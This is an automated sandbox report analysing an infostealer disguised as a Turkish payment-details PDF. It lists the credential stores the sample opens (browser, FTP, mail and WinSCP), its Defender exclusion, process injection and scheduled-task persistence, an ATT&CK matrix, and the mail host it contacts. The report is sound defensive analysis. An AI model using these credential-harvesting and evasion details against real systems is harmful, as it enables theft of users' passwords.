                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exe VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.3f99930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.624993533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.428463798.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414521460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.413814549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415158758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U00d6DEME DETAYLARI_PDF.exe PID: 6816, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U00d6DEME DETAYLARI_PDF.exe PID: 6972, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\#U00d6DEME DETAYLARI_PDF.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: Yara matchFile source: 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U00d6DEME DETAYLARI_PDF.exe PID: 6972, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4046570.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.8.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.4012150.6.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.#U00d6DEME DETAYLARI_PDF.exe.3f99930.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000009.00000000.415725263.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.624993533.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.428463798.0000000003F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.414521460.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.413814549.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000000.415158758.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000009.00000002.626732315.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: #U00d6DEME DETAYLARI_PDF.exe PID: 6816, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: #U00d6DEME DETAYLARI_PDF.exe PID: 6972, type: MEMORYSTR
                    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                    Valid Accounts211
                    Windows Management Instrumentation
                    1
                    Scheduled Task/Job
                    111
                    Process Injection
                    1
                    Masquerading
                    2
                    OS Credential Dumping
                    1
                    Query Registry
                    Remote Services1
                    Email Collection
                    Exfiltration Over Other Network Medium1
                    Encrypted Channel
                    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                    Default Accounts1
                    Scheduled Task/Job
                    Boot or Logon Initialization Scripts1
                    Scheduled Task/Job
                    11
                    Disable or Modify Tools
                    1
                    Credentials in Registry
                    211
                    Security Software Discovery
                    Remote Desktop Protocol11
                    Archive Collected Data
                    Exfiltration Over Bluetooth1
                    Non-Standard Port
                    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)131
                    Virtualization/Sandbox Evasion
                    Security Account Manager1
                    Process Discovery
                    SMB/Windows Admin Shares2
                    Data from Local System
                    Automated Exfiltration1
                    Non-Application Layer Protocol
                    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                    Process Injection
                    NTDS131
                    Virtualization/Sandbox Evasion
                    Distributed Component Object ModelInput CaptureScheduled Transfer11
                    Application Layer Protocol
                    SIM Card SwapCarrier Billing Fraud
                    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                    Deobfuscate/Decode Files or Information
                    LSA Secrets1
                    Application Window Discovery
                    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                    Replication Through Removable MediaLaunchdRc.commonRc.common2
                    Obfuscated Files or Information
                    Cached Domain Credentials1
                    Remote System Discovery
                    VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                    External Remote ServicesScheduled TaskStartup ItemsStartup Items13
                    Software Packing
                    DCSync1
                    File and Directory Discovery
                    Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem114
                    System Information Discovery
                    Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 signatures2 2 Behavior Graph ID: 612096 Sample: #U00d6DEME DETAYLARI_PDF.exe Startdate: 20/04/2022 Architecture: WINDOWS Score: 100 39 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->39 41 Found malware configuration 2->41 43 Malicious sample detected (through community Yara rule) 2->43 45 13 other signatures 2->45 7 #U00d6DEME DETAYLARI_PDF.exe 7 2->7         started        process3 file4 27 C:\Users\user\AppData\Roaming\OsAcNRt.exe, PE32 7->27 dropped 29 C:\Users\user\...\OsAcNRt.exe:Zone.Identifier, ASCII 7->29 dropped 31 C:\Users\user\AppData\Local\...\tmp9B9E.tmp, XML 7->31 dropped 33 C:\Users\...\#U00d6DEME DETAYLARI_PDF.exe.log, ASCII 7->33 dropped 47 Adds a directory exclusion to Windows Defender 7->47 49 Injects a PE file into a foreign processes 7->49 11 #U00d6DEME DETAYLARI_PDF.exe 7->11         started        15 powershell.exe 24 7->15         started        17 powershell.exe 25 7->17         started        19 schtasks.exe 7->19         started        signatures5 process6 dnsIp7 35 yapaszincir.com.tr 78.135.65.4, 49748, 587 PREMIERDC-VERI-MERKEZI-ANONIM-SIRKETIPREMIERDC-SHTR Turkey 11->35 37 mail.yapaszincir.com.tr 11->37 51 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 11->51 53 Tries to steal Mail credentials (via file / registry access) 11->53 55 Tries to harvest and steal ftp login credentials 11->55 57 Tries to harvest and steal browser information (history, passwords, etc) 11->57 21 conhost.exe 15->21         started        23 conhost.exe 17->23         started        25 conhost.exe 19->25         started        signatures8 process9

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    #U00d6DEME DETAYLARI_PDF.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Roaming\OsAcNRt.exe100%Joe Sandbox ML
                    SourceDetectionScannerLabelLinkDownload
                    9.2.#U00d6DEME DETAYLARI_PDF.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.4.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.12.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.6.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.10.unpack100%AviraTR/Spy.Gen8Download File
                    9.0.#U00d6DEME DETAYLARI_PDF.exe.400000.8.unpack100%AviraTR/Spy.Gen8Download File
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                    http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                    http://HuLJDa.com0%Avira URL Cloudsafe
                    http://purl.r0%Avira URL Cloudsafe
                    http://yapaszincir.com.tr0%Avira URL Cloudsafe
                    https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www0%URL Reputationsafe
                    http://en.wikipep0%Avira URL Cloudsafe
                    http://www.tiro.comJ0%Avira URL Cloudsafe
                    http://www.tiro.com0%URL Reputationsafe
                    http://www.goodfont.co.kr0%URL Reputationsafe
                    http://en.w0%URL Reputationsafe
                    http://mail.yapaszincir.com.tr0%Avira URL Cloudsafe
                    http://www.carterandcone.coml0%URL Reputationsafe
                    http://www.sajatypeworks.com0%URL Reputationsafe
                    http://www.typography.netD0%URL Reputationsafe
                    http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                    http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                    http://fontfabrik.com0%URL Reputationsafe
                    http://www.founder.com.cn/cn0%URL Reputationsafe
                    http://www.monotype.0%URL Reputationsafe
                    http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                    http://DynDns.comDynDNSnamejidpasswordPsi/Psi0%URL Reputationsafe
